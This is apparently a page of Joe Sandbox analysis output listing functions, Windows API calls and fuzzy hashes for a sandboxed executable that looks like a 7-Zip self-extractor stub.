Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: HookUnhookWindows
String ID:
API String ID: 2953937349-0
Opcode ID: 654adc1313417019bccd528d387c3d60d6330da7957a6f19a095ad939971c6c1
Instruction ID: 1018a95cfd4037db7c476be7ae8fd58fd2808c3bda652bfad82ce8d172b24bb5
Opcode Fuzzy Hash: 654adc1313417019bccd528d387c3d60d6330da7957a6f19a095ad939971c6c1
Instruction Fuzzy Hash: 290100B1A1590581FB57DB7BE459BA826E1B79CFC5F244119EB0A07AB4CF3D88889301

Function 0000000140001190 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 00f5bfec8f2973510a70e04d8c6b90affda05a7dc7244f1981567c3564593c9a
Instruction ID: 16ab32281b0e81d586dab6da12a9bb12729ce1ac4471678eb6853d3bd0cedf31
Opcode Fuzzy Hash: 00f5bfec8f2973510a70e04d8c6b90affda05a7dc7244f1981567c3564593c9a
Instruction Fuzzy Hash: 8A01447761165082D750CF2AE1413A9B3A1E788FE5F04C225FB694B7A9DA39D491CB10

Function 0000000140002B70 Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002B8D
??3@YAXPEAX@Z.MSVCRT ref: 0000000140002BBF

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 6b5ef724ae6a0eac0edbe87fd7025419717aa064e8b158735b995c3ec93ade3b
Instruction ID: c7ab9152159ff5f37ca87f1a7527b63c5ec991ea54dfb7095fd8723091e79144
Opcode Fuzzy Hash: 6b5ef724ae6a0eac0edbe87fd7025419717aa064e8b158735b995c3ec93ade3b
Instruction Fuzzy Hash: 75014F73614A9086E751CF26E1913ADB761F788FC8F18C111EB450B76ACB39D491CB51

Function 000000014000A0B8 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 000000014000A0DB
SetWindowPos.USER32 ref: 000000014000A100

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ItemWindow
String ID:
API String ID: 1669990519-0
Opcode ID: c210a7b96be3e655390864a15481e134adef30af6a3fce6d6f267cfa016679bf
Instruction ID: 1b5356ec7834afda68c72fe78e66cdc0a1edda5700413894b005cad0b4e30c2c
Opcode Fuzzy Hash: c210a7b96be3e655390864a15481e134adef30af6a3fce6d6f267cfa016679bf
Instruction Fuzzy Hash: 24F0BD76A1479087D710CF5AF44064AB7A0F7DCBA4F144115EF8993B28DB38D8418F00

Function 0000000140014924 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 000000014001493D
GetLastError.KERNEL32 ref: 000000014001494C

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 4ee347a0d6b513108994db27ae333fb9378cbe95e8776ad17626e7710a99fe25
Instruction ID: df4dd4b29a9d1a31a50ec4219ab77e799869cd907522f9456712e432f6790838
Opcode Fuzzy Hash: 4ee347a0d6b513108994db27ae333fb9378cbe95e8776ad17626e7710a99fe25
Instruction Fuzzy Hash: B1E09276610B44C1DB528F63E4807EA73A4E7ACBD0F245111FB6B4B7B4DA39C490C700

Function 0000000140009D30 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 0000000140009D58
EndDialog.USER32 ref: 0000000140009D63

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Dialog
String ID:
API String ID: 1120787796-0
Opcode ID: 25a9e53d3a1eeb5691a451dc41179ffb9d22a845c962607fad3c1796c8f0dd73
Instruction ID: c7c8b73da5189dd947dca57d55429c82a3b1103dcb85d16ac3d7acec8ac49e13
Opcode Fuzzy Hash: 25a9e53d3a1eeb5691a451dc41179ffb9d22a845c962607fad3c1796c8f0dd73
Instruction Fuzzy Hash: 44E0EDB5644540C5E6779B3BD9483AC27A9EBC8F88F548043E70A07AB8CA39C959D201

Function 0000000140009F84 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 0000000140009F97
ShowWindow.USER32 ref: 0000000140009FAC

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: f0d5a292a47fe20b488e9f3b8523a3443fcadbaf93dc11936e3baec2ade07428
Instruction ID: 5a2b2d7995c8c25e6d6664f7dded4284b24ff049640b34c385503f1cdc76f2c6
Opcode Fuzzy Hash: f0d5a292a47fe20b488e9f3b8523a3443fcadbaf93dc11936e3baec2ade07428
Instruction Fuzzy Hash: 17E0CD71612048C2FF169B67E4403B451A0D79CB86F484034E70D47370DB3C8CC58300

Function 0000000140014980 Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400148AC: CloseHandle.KERNEL32(?,?,?,0000000140001746), ref: 00000001400148BE

CreateFileW.KERNELBASE ref: 00000001400149D4

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: e5655017f384219c540a5971092374d116225c755aa00284c0d34560810466bc
Instruction ID: ec9a40f5e83df9f02a96987701a0a6f7619ab68c428aaff9387cafacd6d5b1ff
Opcode Fuzzy Hash: e5655017f384219c540a5971092374d116225c755aa00284c0d34560810466bc
Instruction Fuzzy Hash: 13014F32614B9087D7509F56B44165AB7A5F788BE0F144329FFA903BA5CB78D851CB04

Function 000000014000B384 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

SetWindowTextW.USER32 ref: 000000014000B3E6

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??2@??3@TextWindow
String ID:
API String ID: 890632301-0
Opcode ID: a9c589b876e61ac9cbc79bf36dc34da44af35a83a88b0502e37edf32f8eb48d4
Instruction ID: 4c12c7b822857049e70f90d90bc47868fbed6d249025324668aac4f618e2eb3d
Opcode Fuzzy Hash: a9c589b876e61ac9cbc79bf36dc34da44af35a83a88b0502e37edf32f8eb48d4
Instruction Fuzzy Hash: 60016DF6714A4082EB16DF13E0543FDA3A1B79CBD5F248021EF59077A6CB78C9508B00

Function 0000000140014A2C Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 0000000140014A48

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: eef78d432fb0b3de7e886bfff85a5e8dc7997e8419b81ee5360f3ceb8428fc01
Instruction ID: e473bed060fa2958e53642e57d6aea91d107be03ec3665cdc42f83726ebf7ed7
Opcode Fuzzy Hash: eef78d432fb0b3de7e886bfff85a5e8dc7997e8419b81ee5360f3ceb8428fc01
Instruction Fuzzy Hash: 23D01772624984CBE7019FA1E44476AF764F398BA5F084019EA898A664CBBDC4D9CB00

Function 0000000140001120 Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

AddVectoredExceptionHandler.KERNEL32 ref: 0000000140001132

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 8e1a7f3da97cf8c973d4d16f9f3fa5ef4159b04a4b37ff9b0ef211642af0c7cb
Instruction ID: 46f33ad93f94745197980974301b10bf800fa33eec472c7351be820d734fba3d
Opcode Fuzzy Hash: 8e1a7f3da97cf8c973d4d16f9f3fa5ef4159b04a4b37ff9b0ef211642af0c7cb
Instruction Fuzzy Hash: 24C02BB0700204C1FF1A0BF3B4413D412219B6C7C0F485025DE160F320C93CC0EE8310

Function 000000014000C234 Relevance: 1.5, APIs: 1, Instructions: 7windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000BE00: GetModuleHandleW.KERNEL32 ref: 000000014000BE3E
Part of subcall function 000000014000BE00: LoadIconW.USER32 ref: 000000014000BE4A
Part of subcall function 000000014000BE00: GetSystemMetrics.USER32 ref: 000000014000BE57
Part of subcall function 000000014000BE00: GetSystemMetrics.USER32 ref: 000000014000BE63
Part of subcall function 000000014000BE00: GetModuleHandleW.KERNEL32 ref: 000000014000BE6D
Part of subcall function 000000014000BE00: LoadImageW.USER32 ref: 000000014000BE88
Part of subcall function 000000014000BE00: SendMessageW.USER32 ref: 000000014000BEA8
Part of subcall function 000000014000BE00: SendMessageW.USER32 ref: 000000014000BEBA
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BED9
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BEEB
Part of subcall function 000000014000BE00: GetWindowLongPtrW.USER32 ref: 000000014000BEFE
Part of subcall function 000000014000BE00: SetWindowLongPtrW.USER32 ref: 000000014000BF11
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BF22
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BF31
Part of subcall function 000000014000BE00: GetWindowLongPtrW.USER32 ref: 000000014000BF3F
Part of subcall function 000000014000BE00: SetWindowLongPtrW.USER32 ref: 000000014000BF52
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BF65
Part of subcall function 000000014000BE00: SetWindowTextW.USER32 ref: 000000014000BF74

MessageBeep.USER32 ref: 000000014000C242

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ItemWindow$Long$Message$HandleLoadMetricsModuleSendSystem$BeepIconImageText
String ID:
API String ID: 2380859652-0
Opcode ID: 2ebb189a79c8966759d7510658cc4c7924ef3ca79fa8152c6d4c83d99e019bb8
Instruction ID: 295fe7b416e5ad8808bad6b33e9da75d733f2d3b1b41b7b291ad4d37789fa474
Opcode Fuzzy Hash: 2ebb189a79c8966759d7510658cc4c7924ef3ca79fa8152c6d4c83d99e019bb8
Instruction Fuzzy Hash: 14B01270F2104982E70933F39C423C900D16BDC360FC00434F305472A2CCBC04D60761

Function 0000000140015290 Relevance: 1.3, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000001400152CB

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9e1b5a5441cfe979a60c43ca17f5716e446d2ef4cb9be45658bc37e564c8edbd
Instruction ID: ea208fe4c2d5f8ad3b6a06394e00168be74d69f9d3124f20a441e9903277690f
Opcode Fuzzy Hash: 9e1b5a5441cfe979a60c43ca17f5716e446d2ef4cb9be45658bc37e564c8edbd
Instruction Fuzzy Hash: ABF0BB32314140C2D721AFAEA4507E952E1B74D7C5F544436FB8A8F675D57ACC948504

Function 0000000140015230 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000000014001525C

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8ab46a8bd00273c70218c1dc97830c9414643ab9b69535534f1709d71204f958
Instruction ID: cfd82f93e4b8cfeecb5b4b0f4733c358cacdcf1b10a505f609da48a5778a7b4e
Opcode Fuzzy Hash: 8ab46a8bd00273c70218c1dc97830c9414643ab9b69535534f1709d71204f958
Instruction Fuzzy Hash: D5F02732324180CBD781EFEAA4803E962D0B79CBC1F941035FB878F676D679CC848644

Non-executed Functions

Function 00000001400066A8 Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 168stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32 ref: 00000001400067D5
_wtol.MSVCRT ref: 00000001400068E4

Part of subcall function 00000001400027A0: GetLastError.KERNEL32 ref: 0000000140002807
Part of subcall function 00000001400027A0: wsprintfW.USER32 ref: 000000014000281E
Part of subcall function 00000001400027A0: GetEnvironmentVariableW.KERNEL32 ref: 000000014000282E
Part of subcall function 00000001400027A0: GetLastError.KERNEL32 ref: 0000000140002836
Part of subcall function 00000001400027A0: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002855
Part of subcall function 00000001400027A0: GetEnvironmentVariableW.KERNEL32 ref: 0000000140002869
Part of subcall function 00000001400027A0: GetLastError.KERNEL32 ref: 0000000140002873
Part of subcall function 00000001400027A0: lstrcmpiW.KERNEL32 ref: 000000014000288A
Part of subcall function 00000001400027A0: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140002899
Part of subcall function 00000001400027A0: SetLastError.KERNEL32 ref: 00000001400028AF
Part of subcall function 00000001400027A0: lstrlenA.KERNEL32 ref: 00000001400028E4
Part of subcall function 00000001400027A0: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002901
Part of subcall function 00000001400027A0: GetLocaleInfoW.KERNEL32 ref: 0000000140002937
Part of subcall function 00000001400027A0: _wtol.MSVCRT ref: 0000000140002949
Part of subcall function 00000001400027A0: MultiByteToWideChar.KERNEL32 ref: 0000000140002979

_wtol.MSVCRT ref: 000000014000690A

Strings

GUIMode, xrefs: 00000001400067F1
ExtractPathTitle, xrefs: 0000000140006916
ExtractPathWidth, xrefs: 00000001400068F0
CancelPrompt, xrefs: 0000000140006956
WarningTitle, xrefs: 0000000140006758
ExtractPathText, xrefs: 000000014000692F
ExtractDialogWidth, xrefs: 00000001400068C3
Title, xrefs: 00000001400066B2
ErrorTitle, xrefs: 000000014000673F
Progress, xrefs: 00000001400067A6
ExtractDialogText, xrefs: 00000001400068AA
MiscFlags, xrefs: 0000000140006884
OverwriteMode, xrefs: 0000000140006820
ExtractCancelText, xrefs: 0000000140006898
ExtractTitle, xrefs: 000000014000677F
GUIFlags, xrefs: 0000000140006858

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ErrorLast$_wtol$??2@EnvironmentVariablelstrcmpi$??3@ByteCharInfoLocaleMultiWidelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
API String ID: 23300869-1675048025
Opcode ID: 061ec2ddd1bf58f7a21bf0a088d2c1d6027e84a2573e8fc46ef1f38966f27576
Instruction ID: 4ce12572129288b569918d904226091ecbf46c86c7c6652df9b93c5c15f35cb3
Opcode Fuzzy Hash: 061ec2ddd1bf58f7a21bf0a088d2c1d6027e84a2573e8fc46ef1f38966f27576
Instruction Fuzzy Hash: ED7119B1315B4191FE47EB67B865BD82395AB4E7D0F94642DBA0E07B71EE3CC8848700

Function 000000014000C438 Relevance: 30.1, APIs: 20, Instructions: 142windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140009F84: GetDlgItem.USER32 ref: 0000000140009F97
Part of subcall function 0000000140009F84: ShowWindow.USER32 ref: 0000000140009FAC

GetDlgItem.USER32 ref: 000000014000C47B
SendMessageW.USER32 ref: 000000014000C492
GetDlgItem.USER32 ref: 000000014000C4BD
SetWindowTextW.USER32 ref: 000000014000C4CC

Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058B7
Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058C1
Part of subcall function 000000014000585C: SetWindowTextW.USER32 ref: 00000001400058CE
Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058DB

GetDlgItem.USER32 ref: 000000014000C4FC
GetWindowLongPtrW.USER32 ref: 000000014000C50C
GetDlgItem.USER32 ref: 000000014000C521
SetWindowLongPtrW.USER32 ref: 000000014000C52F
GetSystemMenu.USER32 ref: 000000014000C55B
EnableMenuItem.USER32 ref: 000000014000C571
GetDlgItem.USER32 ref: 000000014000C580
SetFocus.USER32 ref: 000000014000C589
SetTimer.USER32 ref: 000000014000C5C2
CoCreateInstance.OLE32 ref: 000000014000C5F5
GetDlgItem.USER32 ref: 000000014000C618
IsWindow.USER32 ref: 000000014000C621
GetDlgItem.USER32 ref: 000000014000C631
EnableWindow.USER32 ref: 000000014000C63C
GetDlgItem.USER32 ref: 000000014000C654
ShowWindow.USER32 ref: 000000014000C65F

Part of subcall function 000000014000A514: GetDlgItem.USER32 ref: 000000014000A54F

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Item$Window$??3@$EnableLongMenuShowText$CreateFocusInstanceMessageSendSystemTimer
String ID:
API String ID: 2865198823-0
Opcode ID: 31d213a217e679eee7caa83b6e8962264d3fe4114565d4175e179552f65ac473
Instruction ID: c2908e9667d8368a2faf823abfe8b1ec5556b958f635fa6741399732f2738d60
Opcode Fuzzy Hash: 31d213a217e679eee7caa83b6e8962264d3fe4114565d4175e179552f65ac473
Instruction Fuzzy Hash: D1611375600A4182EB16EB63F8547EA63A1BBCDBC5F548028AB4E47BB6CF3CD8458744

Function 00000001400027A0 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 131stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000000140002807
wsprintfW.USER32 ref: 000000014000281E
GetEnvironmentVariableW.KERNEL32 ref: 000000014000282E
GetLastError.KERNEL32 ref: 0000000140002836
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002855
GetEnvironmentVariableW.KERNEL32 ref: 0000000140002869
GetLastError.KERNEL32 ref: 0000000140002873
lstrcmpiW.KERNEL32 ref: 000000014000288A
??3@YAXPEAX@Z.MSVCRT ref: 0000000140002899
SetLastError.KERNEL32 ref: 00000001400028AF
lstrlenA.KERNEL32 ref: 00000001400028E4
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002901
GetLocaleInfoW.KERNEL32 ref: 0000000140002937
_wtol.MSVCRT ref: 0000000140002949
MultiByteToWideChar.KERNEL32 ref: 0000000140002979

Strings

7zSfxString%d, xrefs: 000000014000280D

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable$??3@ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d
API String ID: 579950010-3906403175
Opcode ID: 53bbe095b864e146d7c704bffd2da1ab7094653d32718c2add295021c4666381
Instruction ID: 70b70016266b01a59d2817593f45409e52cee35171342eb85d29ca9cbc831483
Opcode Fuzzy Hash: 53bbe095b864e146d7c704bffd2da1ab7094653d32718c2add295021c4666381
Instruction Fuzzy Hash: 92516972205A4186EB56DF62E8407E933A2F79CBD4F444129FB1A87BB4DF38C949C740

Function 000000014000222C Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 83libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140002250
FindResourceExA.KERNEL32 ref: 000000014000226A
FindResourceExA.KERNEL32 ref: 0000000140002286
SizeofResource.KERNEL32 ref: 000000014000229F
LoadResource.KERNEL32 ref: 00000001400022B1
LockResource.KERNEL32 ref: 00000001400022BF
LoadLibraryA.KERNEL32 ref: 00000001400022E8
GetProcAddress.KERNEL32 ref: 00000001400022F8
wsprintfW.USER32 ref: 0000000140002326
LoadLibraryA.KERNEL32 ref: 0000000140002338
